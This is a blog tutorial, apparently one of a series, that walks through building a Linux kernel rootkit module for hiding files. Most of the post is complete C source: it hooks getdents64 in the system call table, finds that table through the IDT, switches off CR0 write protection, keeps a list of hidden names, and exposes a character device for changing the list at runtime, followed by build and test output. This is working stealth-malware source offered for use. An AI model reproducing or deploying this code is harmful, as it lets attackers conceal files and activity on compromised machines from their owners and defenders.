🔒
There are new articles available, click to refresh the page.
✇eXploit

Rootkit for Hiding Files

By: 0xe7

In this post I am going to be putting together all of the knowledge we have gained in the previous posts and improving on the last rootkit in a few different ways.

I will fix the issue that I explained the last LKM had (being able to query the file directly using ls [filename]), while making it more portable and giving it the ability to hide multiple files but I will start with splitting the LKM into multiple files to make it easier to manage.

The code for this rootkit will be in a link at the bottom of the post in .tgz format.

Splitting The LKM

Having the LKM split across multiple files makes it easier to manage, especially as the module gets more and more complex.

First we will start with the main file:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#include <linux/module.h>
#include <linux/init.h>
#include <linux/unistd.h>
#include <linux/miscdevice.h>

MODULE_AUTHOR("0xe7, 0x1e");
MODULE_DESCRIPTION("Hide files on the system");
MODULE_LICENSE("GPL");

void **sys_call_table;

static int __init hidefiles_init(void)
{

    sys_call_table = (void*)0xc1454100;
    original_getdents64 = sys_call_table[__NR_getdents64];

    set_page_rw(sys_call_table);
    sys_call_table[__NR_getdents64] = sys_getdents64_hook;
    set_page_ro(sys_call_table);
    return 0;
}

static void __exit hidefiles_exit(void)
{
    set_page_rw(sys_call_table);
    sys_call_table[__NR_getdents64] = original_getdents64;
    set_page_ro(sys_call_table);
    return;
}

module_init(hidefiles_init);
module_exit(hidefiles_exit);

I've made a couple of changes here, like I've set the sys_call_table page to read only after I've made the change and changing the name of the init and exit functions, but other than that it is copy and pasted from the last LKM.

Now for the file containing the system calls:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#define FILE_NAME "thisisatestfile.txt"

asmlinkage int (*original_getdents64) (unsigned int fd, struct linux_dirent64 *dirp, unsigned int count);

asmlinkage int sys_getdents64_hook(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count)
{
    int rtn;
    struct linux_dirent64 *cur = dirp;
    int i = 0;
    rtn = original_getdents64(fd, dirp, count);
    while (i < rtn) {
        if (strncmp(cur->d_name, FILE_NAME, strlen(FILE_NAME)) == 0) {
            int reclen = cur->d_reclen;
            char *next_rec = (char *)cur + reclen;
            int len = (int)dirp + rtn - (int)next_rec;
            memmove(cur, next_rec, len);
            rtn -= reclen;
            continue;
        }
        i += cur->d_reclen;
        cur = (struct linux_dirent64*) ((char*)dirp + i);
    }
    return rtn;
}

We also need to create a header file for the syscalls so that the functions can be referenced from the main.c file:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
#ifndef SYSCALLS
#define SYSCALLS

#include <linux/semaphore.h>
#include <linux/types.h>
#include <linux/dirent.h>

// Functions
asmlinkage int sys_getdents64_hook(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count);
extern asmlinkage int (*original_getdents64) (unsigned int fd, struct linux_dirent64 *dirp, unsigned int count);

#endif

This needs to be included in both the main.c and syscalls.c files, just add the line #include "syscalls.h" somewhere near the top.

This is why we have to put #ifndef, this ensures that the file will not be included twice.

Now we need to create the C file for the last set of functions:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
#include <asm/cacheflush.h>

int set_page_rw(unsigned long addr)
{
    unsigned int level;
    pte_t *pte = lookup_address(addr, &level);
    if (pte->pte &~ _PAGE_RW) pte->pte |= _PAGE_RW;
    return 0;
}

int set_page_ro(unsigned long addr)
{
    unsigned int level;
    pte_t *pte = lookup_address(addr, &level);
    pte->pte = pte->pte &~_PAGE_RW;
    return 0;
}

We also need to create a header file for these functions so we can use them inside main.c:

1
2
3
4
5
6
7
#ifndef FUNCTS
#define FUNCTS

int set_page_rw(unsigned long addr);
int set_page_ro(unsigned long addr);

#endif

This file also needs to be included in main.c with the line #include "functs.h".

We now need a makefile:

1
2
3
obj-m += hidefiles.o

hidefiles-y := main.o syscalls.o functs.o

I couldn't get it to work by just running make so I had to run the full command myself:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
[email protected]:~/lkms/hidefiles# make -C /lib/modules/$(uname -r)/build M=$PWD modules
make: Entering directory `/usr/src/linux-headers-3.14-kali1-686-pae'
  CC [M]  /root/lkms/hidefiles/main.o
/root/lkms/hidefiles/main.c: In function ‘hidefiles_init’:
/root/lkms/hidefiles/main.c:21:9: warning: passing argument 1 of ‘set_page_rw’ makes integer from pointer without a cast [enabled by default]
In file included from /root/lkms/hidefiles/main.c:7:0:
/root/lkms/hidefiles/functs.h:4:5: note: expected ‘long unsigned int’ but argument is of type ‘void **’
/root/lkms/hidefiles/main.c:23:2: warning: passing argument 1 of ‘set_page_ro’ makes integer from pointer without a cast [enabled by default]
In file included from /root/lkms/hidefiles/main.c:7:0:
/root/lkms/hidefiles/functs.h:5:5: note: expected ‘long unsigned int’ but argument is of type ‘void **’
/root/lkms/hidefiles/main.c: In function ‘hidefiles_exit’:
/root/lkms/hidefiles/main.c:29:2: warning: passing argument 1 of ‘set_page_rw’ makes integer from pointer without a cast [enabled by default]
In file included from /root/lkms/hidefiles/main.c:7:0:
/root/lkms/hidefiles/functs.h:4:5: note: expected ‘long unsigned int’ but argument is of type ‘void **’
/root/lkms/hidefiles/main.c:31:9: warning: passing argument 1 of ‘set_page_ro’ makes integer from pointer without a cast [enabled by default]
In file included from /root/lkms/hidefiles/main.c:7:0:
/root/lkms/hidefiles/functs.h:5:5: note: expected ‘long unsigned int’ but argument is of type ‘void **’
  CC [M]  /root/lkms/hidefiles/functs.o
  LD [M]  /root/lkms/hidefiles/hidefiles.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /root/lkms/hidefiles/hidefiles.mod.o
  LD [M]  /root/lkms/hidefiles/hidefiles.ko
make: Leaving directory `/usr/src/linux-headers-3.14-kali1-686-pae'

We can ignore these warnings for the moment, we are going to replace these functions anyway.

Now to test our rootkit:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
[email protected]:~/lkms/hidefiles# ls -l
total 460
-rw-r--r-- 1 root root    344 Oct 31 14:11 functs.c
-rw-r--r-- 1 root root    113 Oct 31 14:11 functs.h
-rw-r--r-- 1 root root  62328 Oct 31 14:11 functs.o
-rw-r--r-- 1 root root 152670 Oct 31 14:11 hidefiles.ko
-rw-r--r-- 1 root root    810 Oct 31 14:11 hidefiles.mod.c
-rw-r--r-- 1 root root  42660 Oct 31 14:11 hidefiles.mod.o
-rw-r--r-- 1 root root 111024 Oct 31 14:11 hidefiles.o
-rw-r--r-- 1 root root    825 Oct 31 14:04 main.c
-rw-r--r-- 1 root root  33312 Oct 31 14:11 main.o
-rw-r--r-- 1 root root     64 Oct 31 14:01 Makefile
-rw-r--r-- 1 root root     41 Oct 31 14:11 modules.order
-rw-r--r-- 1 root root      0 Oct 31 14:11 Module.symvers
-rw-r--r-- 1 root root    968 Oct 31 14:00 syscalls.c
-rw-r--r-- 1 root root    352 Oct 31 14:07 syscalls.h
-rw-r--r-- 1 root root  18048 Oct 31 14:07 syscalls.o
[email protected]:~/lkms/hidefiles# touch thisisatestfile.txt
[email protected]:~/lkms/hidefiles# ls -l
total 460
-rw-r--r-- 1 root root    344 Oct 31 14:11 functs.c
-rw-r--r-- 1 root root    113 Oct 31 14:11 functs.h
-rw-r--r-- 1 root root  62328 Oct 31 14:11 functs.o
-rw-r--r-- 1 root root 152670 Oct 31 14:11 hidefiles.ko
-rw-r--r-- 1 root root    810 Oct 31 14:11 hidefiles.mod.c
-rw-r--r-- 1 root root  42660 Oct 31 14:11 hidefiles.mod.o
-rw-r--r-- 1 root root 111024 Oct 31 14:11 hidefiles.o
-rw-r--r-- 1 root root    825 Oct 31 14:04 main.c
-rw-r--r-- 1 root root  33312 Oct 31 14:11 main.o
-rw-r--r-- 1 root root     64 Oct 31 14:01 Makefile
-rw-r--r-- 1 root root     41 Oct 31 14:11 modules.order
-rw-r--r-- 1 root root      0 Oct 31 14:11 Module.symvers
-rw-r--r-- 1 root root    968 Oct 31 14:00 syscalls.c
-rw-r--r-- 1 root root    352 Oct 31 14:07 syscalls.h
-rw-r--r-- 1 root root  18048 Oct 31 14:07 syscalls.o
-rw-r--r-- 1 root root      0 Oct 31 14:18 thisisatestfile.txt
[email protected]:~/lkms/hidefiles# insmod ./hidefiles.ko
[email protected]:~/lkms/hidefiles# ls -l
total 460
-rw-r--r-- 1 root root    344 Oct 31 14:11 functs.c
-rw-r--r-- 1 root root    113 Oct 31 14:11 functs.h
-rw-r--r-- 1 root root  62328 Oct 31 14:11 functs.o
-rw-r--r-- 1 root root 152670 Oct 31 14:11 hidefiles.ko
-rw-r--r-- 1 root root    810 Oct 31 14:11 hidefiles.mod.c
-rw-r--r-- 1 root root  42660 Oct 31 14:11 hidefiles.mod.o
-rw-r--r-- 1 root root 111024 Oct 31 14:11 hidefiles.o
-rw-r--r-- 1 root root    825 Oct 31 14:04 main.c
-rw-r--r-- 1 root root  33312 Oct 31 14:11 main.o
-rw-r--r-- 1 root root     64 Oct 31 14:01 Makefile
-rw-r--r-- 1 root root     41 Oct 31 14:11 modules.order
-rw-r--r-- 1 root root      0 Oct 31 14:11 Module.symvers
-rw-r--r-- 1 root root    968 Oct 31 14:00 syscalls.c
-rw-r--r-- 1 root root    352 Oct 31 14:07 syscalls.h
-rw-r--r-- 1 root root  18048 Oct 31 14:07 syscalls.o
[email protected]:~/lkms/hidefiles# rmmod hidefiles
[email protected]:~/lkms/hidefiles# ls -l
total 460
-rw-r--r-- 1 root root    344 Oct 31 14:11 functs.c
-rw-r--r-- 1 root root    113 Oct 31 14:11 functs.h
-rw-r--r-- 1 root root  62328 Oct 31 14:11 functs.o
-rw-r--r-- 1 root root 152670 Oct 31 14:11 hidefiles.ko
-rw-r--r-- 1 root root    810 Oct 31 14:11 hidefiles.mod.c
-rw-r--r-- 1 root root  42660 Oct 31 14:11 hidefiles.mod.o
-rw-r--r-- 1 root root 111024 Oct 31 14:11 hidefiles.o
-rw-r--r-- 1 root root    825 Oct 31 14:04 main.c
-rw-r--r-- 1 root root  33312 Oct 31 14:11 main.o
-rw-r--r-- 1 root root     64 Oct 31 14:01 Makefile
-rw-r--r-- 1 root root     41 Oct 31 14:11 modules.order
-rw-r--r-- 1 root root      0 Oct 31 14:11 Module.symvers
-rw-r--r-- 1 root root    968 Oct 31 14:00 syscalls.c
-rw-r--r-- 1 root root    352 Oct 31 14:07 syscalls.h
-rw-r--r-- 1 root root  18048 Oct 31 14:07 syscalls.o
-rw-r--r-- 1 root root      0 Oct 31 14:18 thisisatestfile.txt

So it seems to work nicely, now we can concentrate on extending it.

Automagically Finding sys_call_table

A brilliant writeup of how to find the sys_call_table, amungst other things, on x86 Linux is here. I highly recommend reading that post.

We are going to use the technique under section 3.1, titled How to get sys_call_table[] without LKM.

You can use a slight vairation of this technique on each architecture, just search Google a bit and you should be able to find something if you can't work it out from this description.

Firstly we need to read the Interrupt Descriptor Table Register (IDTR) and get the address of the base of the Interrupt Descriptor Table (IDT).

Offset 0x80 from the IDT base address is the address of a function called system_call, this function uses call to make system calls using the sys_call_table.

Once we have the base address of the system_call function we need to search through its code for 3 bytes ("\xff\x14\x85").

The memmem function just searches through code for a particular set of bytes and returns a pointer to it if found or NULL if not. Its implemented in libc but we will have to implement it ourselves in our LKM.

We also need to remember to include the 2 structs idtr and idt.

Here's the code for all of this which we can put into functs.c:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
struct {
    unsigned short limit;
    unsigned long base;
} __attribute__ ((packed))idtr;

struct {
    unsigned short off1;
    unsigned short sel;
    unsigned char none, flags;
    unsigned short off2;
} __attribute__ ((packed))idt;

void *memmem(const void *haystack, size_t haystacklen, const void *needle, size_t needlelen)
{
    char *p;

    for(p = (char *)haystack; p <= ((char *)haystack - needlelen + haystacklen); p++)
        if(memcmp(p, needle, needlelen) == 0)
            return (void *)p;
    return NULL;
}

unsigned long *find_sys_call_table(void)
{
    char **p;
    unsigned long sct_off = 0;
    unsigned char code[255];

    asm("sidt %0":"=m" (idtr));
    memcpy(&idt, (void *)(idtr.base + 8 * 0x80), sizeof(idt));
    sct_off = (idt.off2 << 16) | idt.off1;
    memcpy(code, (void *)sct_off, sizeof(code));

    p = (char **)memmem(code, sizeof(code), "\xff\x14\x85", 3);

    if(p)
        return *(unsigned long **)((char *)p + 3);
    else
        return NULL;
}

We also need to add the following prototype to functs.h:

1
unsigned long *find_sys_call_table(void);

Lastly we need to edit main.c so that we get the address of sys_call_table using this method, we just replace the line that starts sys_call_table = with:

1
2
3
    sys_call_table = find_sys_call_table();
    if(sys_call_table == NULL)
        return 1;

Improving The Method Of Writing To Read-Only Memory

So far we have manually changed the page table entry to change the permissions on the specific page that we want to write to read-write.

As we are running with the same privileges as the kernel we can do this in an easier way and ensure that any changes to this mechanism in the future doesn't stop our ability to write to this memory.

Running in kernel mode we have the ability to change the CR0 register.

The 16th bit of the CR0 register is responsible for enforcing whether or not the CPU can write to memory marked read-only.

With this is mind we can rewrite the functions that we were using in functs.c for this:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
void disable_write_protection(void)
{
    unsigned long value;
    asm volatile("mov %%cr0,%0" : "=r" (value));
    if (value & 0x00010000) {
        value &= ~0x00010000;
        asm volatile("mov %0,%%cr0": : "r" (value));
    }
}

void enable_write_protection(void)
{
    unsigned long value;
    asm volatile("mov %%cr0,%0" : "=r" (value));
    if (!(value & 0x00010000)) {
        value |= 0x00010000;
        asm volatile("mov %0,%%cr0": : "r" (value));
    }
}

I've changed the names to make it apparent that these functions are actually doing something different.

You also need to change the 2 prototypes in functs.h to:

1
2
void disable_write_protection(void);
void enable_write_protection(void);

Lastly we need to edit main.c, remember these new functions do not require an argument.

Multi-File Support

To support hiding multiple files we need to implement a character device to communicate with the rootkit (we could use a network connection but we'll take that up later) and we need a method of storing the data.

For storing the data we will use a linked list, the kernel has the ability to manipulate linked lists but I will create my own functions for doing this as a programming exercise (later we will investigate how to use the features already in the kernel).

Linked List

First let's create the linked list and the functions for adding and removing items:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
struct file_list {
    char *file_name;
    struct file_list *next_file;
};

typedef struct file_list list;

list *hidden_files = NULL;

void addfile(const char *f)
{
    list *tmp;
    char *s;
    if (hidden_files == NULL) {
        tmp = (list*)vmalloc(sizeof(list));
        s = vmalloc(sizeof(*f));
        strcpy(s, f);
        tmp->file_name = s;
        tmp->next_file = hidden_files;
        hidden_files = tmp;
    } else {
        tmp = hidden_files;
        while (tmp != NULL && (strlen(tmp->file_name) != strlen(f) || strncmp(tmp->file_name, f, strlen(tmp->file_name)) != 0)) {
            tmp = tmp->next_file;
        }
        if (tmp == NULL) {
            list *tmp2;
            tmp2 = (list*)vmalloc(sizeof(list));
            s = vmalloc(sizeof(*f));
            strcpy(s, f);
            tmp2->file_name = s;
            tmp2->next_file = hidden_files;
            hidden_files = tmp2;
        }
    }
}

void remfile(const char *f)
{
    list *tmp, *tmp2;
    int c = 0;
    tmp = hidden_files;
    while (tmp != NULL) {
        if (strlen(tmp->file_name) == strlen(f)){
            if (strncmp(tmp->file_name, f, strlen(tmp->file_name)) == 0) {
                if (c == 0) {
                    hidden_files = tmp->next_file;
                    vfree(tmp->file_name);
                    vfree(tmp);
                    return;
                }
                tmp2->next_file = tmp->next_file;
                vfree(tmp->file_name);
                vfree(tmp);
            }
        }
        tmp2 = tmp;
        tmp = tmp->next_file;
        c += 1;
    }
}

The structure of each element is defined at the top (lines 1 - 4), its pretty simple, just a basic singly linked list.

2 functions are then defined addfile and remfile, which are pretty self-explainitory, 1 thing to note here is that the vmalloc function is being used to allocate the memory, which allocates a contiguous address range of virtual memory, this obviously means that vfree has to be used to free the memory after.

Both of these functions take 1 argument, a string, and add or remove that string to the list depending on which function is called.

Its best to create a function that empties the list:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
void emptylist()
{
    list *tmp;
    tmp = hidden_files;
    while (tmp != NULL) {
        hidden_files = tmp->next_file;
        vfree(tmp->file_name);
        vfree(tmp);
        tmp = hidden_files;
    }
}

Lastly we need a function to check if a name exists in the list:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
int lookupfilename(const char *f)
{
    list *tmp;
    tmp = hidden_files;
    while (tmp != NULL) {
        if (strlen(tmp->file_name) == strlen(f)){
            if (strncmp(f, tmp->file_name, strlen(tmp->file_name)) == 0){
                return 1;
            }
        }
        tmp = tmp->next_file;
    }
    return 0;
}

This functions takes a string as an argument and iterates through the list checking, first the length, and then the whole string, against every entry in the list, if it finds a match it returns a 1, otherwise it returns a 0.

Initially I developed this linked list in a normal C application and just improved upon it and kernelfied it. :-) Here is my original application:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct file_list {
    char *file_name;
    struct file_list *next_file;
};
typedef struct file_list list;
list *hidden_files = NULL;

void addfile(const char *f);
void remfile(char *f);
void printfiles();

void main()
{
    addfile("one");
    remfile("one");
    printfiles();
    addfile("two");
    printfiles();
    addfile("three");
    addfile("four");
    printfiles();
    remfile("two");

    printfiles();
}

void addfile(const char *f)
{
    list *tmp;
    if (hidden_files == NULL) {
        tmp = (list*)malloc(sizeof(list));
        char *s = malloc(sizeof(*f));
        strcpy(s, f);
        tmp->file_name = s;
        tmp->next_file = hidden_files;
        hidden_files = tmp;
    } else {
        tmp = hidden_files;
        while (tmp != NULL && strcmp(tmp->file_name, f) != 0) {
            tmp = tmp->next_file;
        }
        if (tmp == NULL) {
            list *tmp2;
            tmp2 = (list*)malloc(sizeof(list));
            char *s = malloc(sizeof(*f));
            strcpy(s, f);
            tmp2->file_name = s;
            tmp2->next_file = hidden_files;
            hidden_files = tmp2;
        }
    }
}

void remfile(char *f)
{
    list *tmp, *tmp2;
    int c = 0;
    tmp = hidden_files;
    while (tmp != NULL) {
        if (strcmp(tmp->file_name, f) == 0) {
            if (c == 0) {
                hidden_files = tmp->next_file;
                free(tmp->file_name);
                free(tmp);
                return;
            }
            tmp2->next_file = tmp->next_file;
            free(tmp->file_name);
            free(tmp);
        }
        tmp2 = tmp;
        tmp = tmp->next_file;
        c += 1;
    }
}

void printfiles()
{
    list *tmp;
    tmp = hidden_files;
    while (tmp != NULL) {
        printf("%s : %x\n", tmp->file_name, tmp->next_file);
        tmp = tmp->next_file;
    }
}

Clearly this application is using more primitive versions of the addfile and remfile functions above. Its also using the usermode's malloc and free instead of vmalloc and vfree for obvious reasons.

I only included this to show how I've developed these functions in usermode and then converted it to kernelmode.

Anyway, the kernel functions above (addfile, remfile, emptylist and lookupfilename) as well as the struct declarations and definition should go into the file list.c.

#include "list.h" should be put at the top and the file list.h should be created with the following:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
#ifndef LIST
#define LIST

#include <linux/vmalloc.h>

// Functions
void addfile(const char *f);
void remfile(const char *f);
void emptylist(void);
int lookupfilename(const char *f);

#endif

We need to include the linux/vmalloc.h header file for the vmalloc and vfree functions.

syscalls.c needs to be changed, list.h needs to be included, the FILE_NAME definition should be removed and the strncmp line should be changed to use lookupfilename instead, so it should end up like the following:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
#include "syscalls.h"
#include "list.h"

asmlinkage int (*original_getdents64) (unsigned int fd, struct linux_dirent64 *dirp, unsigned int count);

asmlinkage int sys_getdents64_hook(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count)
{
    int rtn;
    struct linux_dirent64 *cur = dirp;
    int i = 0;
    rtn = original_getdents64(fd, dirp, count);
    while (i < rtn) {
        if (lookupfilename(cur->d_name) == 1) {
            int reclen = cur->d_reclen;
            char *next_rec = (char *)cur + reclen;
            int len = (int)dirp + rtn - (int)next_rec;
            memmove(cur, next_rec, len);
            rtn -= reclen;
            continue;
        }
        i += cur->d_reclen;
        cur = (struct linux_dirent64*) ((char*)dirp + i);
    }
    return rtn;
}

Because we want to hide some files when the LKM is loaded and also empty the list when the LKM is unloaded we need to include the list.h header file and make the relevent calls to addfile and emptylist in main.c, so our main.c should end up like this:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
#include <linux/module.h>
#include <linux/init.h>
#include <linux/unistd.h>
#include <linux/miscdevice.h>

#include "syscalls.h"
#include "functs.h"
#include "list.h"

MODULE_AUTHOR("0xe7, 0x1e");
MODULE_DESCRIPTION("Hide files on the system");
MODULE_LICENSE("GPL");

void **sys_call_table;

static int __init hidefiles_init(void)
{
    sys_call_table = find_sys_call_table();
    if(sys_call_table == NULL)
        return 1;
    original_getdents64 = sys_call_table[__NR_getdents64];

    disable_write_protection();
    sys_call_table[__NR_getdents64] = sys_getdents64_hook;
    enable_write_protection();
    addfile("thisisatestfile.txt");
    return 0;
}

static void __exit hidefiles_exit(void)
{
    disable_write_protection();
    sys_call_table[__NR_getdents64] = original_getdents64;
    enable_write_protection();
    emptylist();
    return;
}

module_init(hidefiles_init);
module_exit(hidefiles_exit);

Lastly we need to edit the Makefile to include list.o, so it should end up like this:

1
2
3
obj-m += hidefiles.o

hidefiles-y := main.o syscalls.o functs.o list.o

Now to compile and test:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
[email protected]:~/lkms/hidefiles# make -C /lib/modules/$(uname -r)/build M=$PWD modules
make: Entering directory `/usr/src/linux-headers-3.14-kali1-686-pae'
  CC [M]  /root/lkms/hidefiles/main.o
/root/lkms/hidefiles/main.c: In function ‘hidefiles_init’:
/root/lkms/hidefiles/main.c:18:17: warning: assignment from incompatible pointer type [enabled by default]
  CC [M]  /root/lkms/hidefiles/syscalls.o
  CC [M]  /root/lkms/hidefiles/list.o
  LD [M]  /root/lkms/hidefiles/hidefiles.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /root/lkms/hidefiles/hidefiles.mod.o
  LD [M]  /root/lkms/hidefiles/hidefiles.ko
make: Leaving directory `/usr/src/linux-headers-3.14-kali1-686-pae'
[email protected]:~/lkms/hidefiles# ls
functs.c  functs.o      hidefiles.mod.c  hidefiles.o  list.h  main.c  Makefile       Module.symvers  syscalls.h  thisisatestfile.txt
functs.h  hidefiles.ko  hidefiles.mod.o  list.c       list.o  main.o  modules.order  syscalls.c      syscalls.o
[email protected]:~/lkms/hidefiles# insmod ./hidefiles.ko
[email protected]:~/lkms/hidefiles# ls
functs.c  functs.o      hidefiles.mod.c  hidefiles.o  list.h  main.c  Makefile       Module.symvers  syscalls.h
functs.h  hidefiles.ko  hidefiles.mod.o  list.c       list.o  main.o  modules.order  syscalls.c      syscalls.o
[email protected]:~/lkms/hidefiles# rmmod hidefiles
[email protected]:~/lkms/hidefiles# ls
functs.c  functs.o      hidefiles.mod.c  hidefiles.o  list.h  main.c  Makefile       Module.symvers  syscalls.h  thisisatestfile.txt
functs.h  hidefiles.ko  hidefiles.mod.o  list.c       list.o  main.o  modules.order  syscalls.c      syscalls.o

So, as you can clearly see, our LKM automatically hides files on initialization and now should have the capability to hide multiple files.

Character Device

We now need the ability to communicate with the LKM to dynamically hide and unhide files. The only way we've learned how to do this so far is by using a character device.

This character device will be simpler than our previous one because we only need the write operation but you can implement read for feedback if you want.

We will put this in a new file:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
#include "cdev.h"

#define DEV_MAX 512

static struct file_operations dev_fops = {
    .write = dev_write,
};

struct miscdevice dev_misc_device = {
    .minor = MISC_DYNAMIC_MINOR,
    .name = "hidefiles",
    .fops = &dev_fops
};

ssize_t dev_write(struct file *filep,const char *buff,size_t count,loff_t *offp )
{
    char temp_dev_file[DEV_MAX+1], new_dev_file[DEV_MAX];
    int i, n;
    memset(new_dev_file, 0, DEV_MAX);
    memset(temp_dev_file, 0, DEV_MAX+1);
    if(count > DEV_MAX){
        if(copy_from_user(temp_dev_file,buff,DEV_MAX) != 0)
            printk("Userspace -> kernel copy failed!\n");
        else {
            temp_dev_file[DEV_MAX] = '\0';
            for (i = 2, n = 0; i < strlen(temp_dev_file); i++, n++) {
                new_dev_file[n] = temp_dev_file[i];
            }
            if (strncmp(temp_dev_file, "a", 1) == 0 || strncmp(temp_dev_file, "A", 1) == 0) {
                addfile(new_dev_file);
            } else if (strncmp(temp_dev_file, "r", 1) == 0 || strncmp(temp_dev_file, "R", 1) == 0) {
                remfile(new_dev_file);
            }
        }
        return DEV_MAX;
    } else {
        if(copy_from_user(temp_dev_file,buff,count) != 0)
            printk("Userspace -> kernel copy failed!\n");
        else {
            for (i = 2, n = 0; i < strlen(temp_dev_file); i++, n++) {
                new_dev_file[n] = temp_dev_file[i];
            }
            if (strncmp(temp_dev_file, "a", 1) == 0 || strncmp(temp_dev_file, "A", 1) == 0) {
                addfile(new_dev_file);
            } else if (strncmp(temp_dev_file, "r", 1) == 0 || strncmp(temp_dev_file, "R", 1) == 0) {
                remfile(new_dev_file);
            }
        }
        return count;
    }
}

Here I'm setting the maximum size to 512 but you can set it to what you wish.

I also return the number of bytes written here so that it doesn't break some applications that try to write to it (python for example).

The first character of the input is being used as the operation (A or a for adding a file and R or r for removing a file) and the actual filename starts after the second character in the input.

I've also fixed the buffer overflow that was in the last character device.

We need to create the following header file:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
#ifndef CDEV
#define CDEV

#include <linux/fs.h>
#include <asm/uaccess.h>
#include <linux/miscdevice.h>

#include "list.h"

// Functions
ssize_t dev_write(struct file *filep,const char *buff,size_t count,loff_t *offp );


// Structs
extern struct miscdevice dev_misc_device;

#endif

Now we need to include cdev.h in main.c, by adding the line #include "cdev.h" at the top, initialize the device on load and remove the device on unload, so our main.c should end up like this:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#include <linux/module.h>
#include <linux/init.h>
#include <linux/unistd.h>
#include <linux/miscdevice.h>

#include "syscalls.h"
#include "functs.h"
#include "list.h"
#include "cdev.h"

MODULE_AUTHOR("0xe7, 0x1e");
MODULE_DESCRIPTION("Hide files on the system");
MODULE_LICENSE("GPL");

void **sys_call_table;

static int __init hidefiles_init(void)
{
    sys_call_table = find_sys_call_table();
    if(sys_call_table == NULL)
        return 1;
    original_getdents64 = sys_call_table[__NR_getdents64];

    disable_write_protection();
    sys_call_table[__NR_getdents64] = sys_getdents64_hook;
    enable_write_protection();
    misc_register(&dev_misc_device);
    addfile("thisisatestfile.txt");
    return 0;
}

static void __exit hidefiles_exit(void)
{
    disable_write_protection();
    sys_call_table[__NR_getdents64] = original_getdents64;
    enable_write_protection();
    misc_deregister(&dev_misc_device);
    emptylist();
    return;
}

module_init(hidefiles_init);
module_exit(hidefiles_exit);

Lastly we need to add cdev.o to the makefile:

1
2
3
obj-m += hidefiles.o

hidefiles-y := main.o syscalls.o functs.o list.o cdev.o

Now we just need to test it:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
[email protected]:~/lkms/hidefiles# make -C /lib/modules/$(uname -r)/build M=$PWD modules
make: Entering directory `/usr/src/linux-headers-3.14-kali1-686-pae'
  CC [M]  /root/lkms/hidefiles/cdev.o
/root/lkms/hidefiles/cdev.c: In function ‘dev_write’:
/root/lkms/hidefiles/cdev.c:50:1: warning: the frame size of 1028 bytes is larger than 1024 bytes [-Wframe-larger-than=]
  LD [M]  /root/lkms/hidefiles/hidefiles.o
  Building modules, stage 2.
  MODPOST 1 modules
  LD [M]  /root/lkms/hidefiles/hidefiles.ko
make: Leaving directory `/usr/src/linux-headers-3.14-kali1-686-pae'
[email protected]:~/lkms/hidefiles# ls
app     cdev.h    functs.h      hidefiles.mod.c  list.c  main.c    modules.order   syscalls.h
app.c   cdev.o    functs.o      hidefiles.mod.o  list.h  main.o    Module.symvers  syscalls.o
cdev.c  functs.c  hidefiles.ko  hidefiles.o      list.o  Makefile  syscalls.c      thisisatestfile.txt
[email protected]:~/lkms/hidefiles# insmod ./hidefiles.ko
[email protected]:~/lkms/hidefiles# ls
app    cdev.c  cdev.o    functs.h  hidefiles.ko     hidefiles.mod.o  list.c  list.o  main.o    modules.order   syscalls.c  syscalls.o
app.c  cdev.h  functs.c  functs.o  hidefiles.mod.c  hidefiles.o      list.h  main.c  Makefile  Module.symvers  syscalls.h
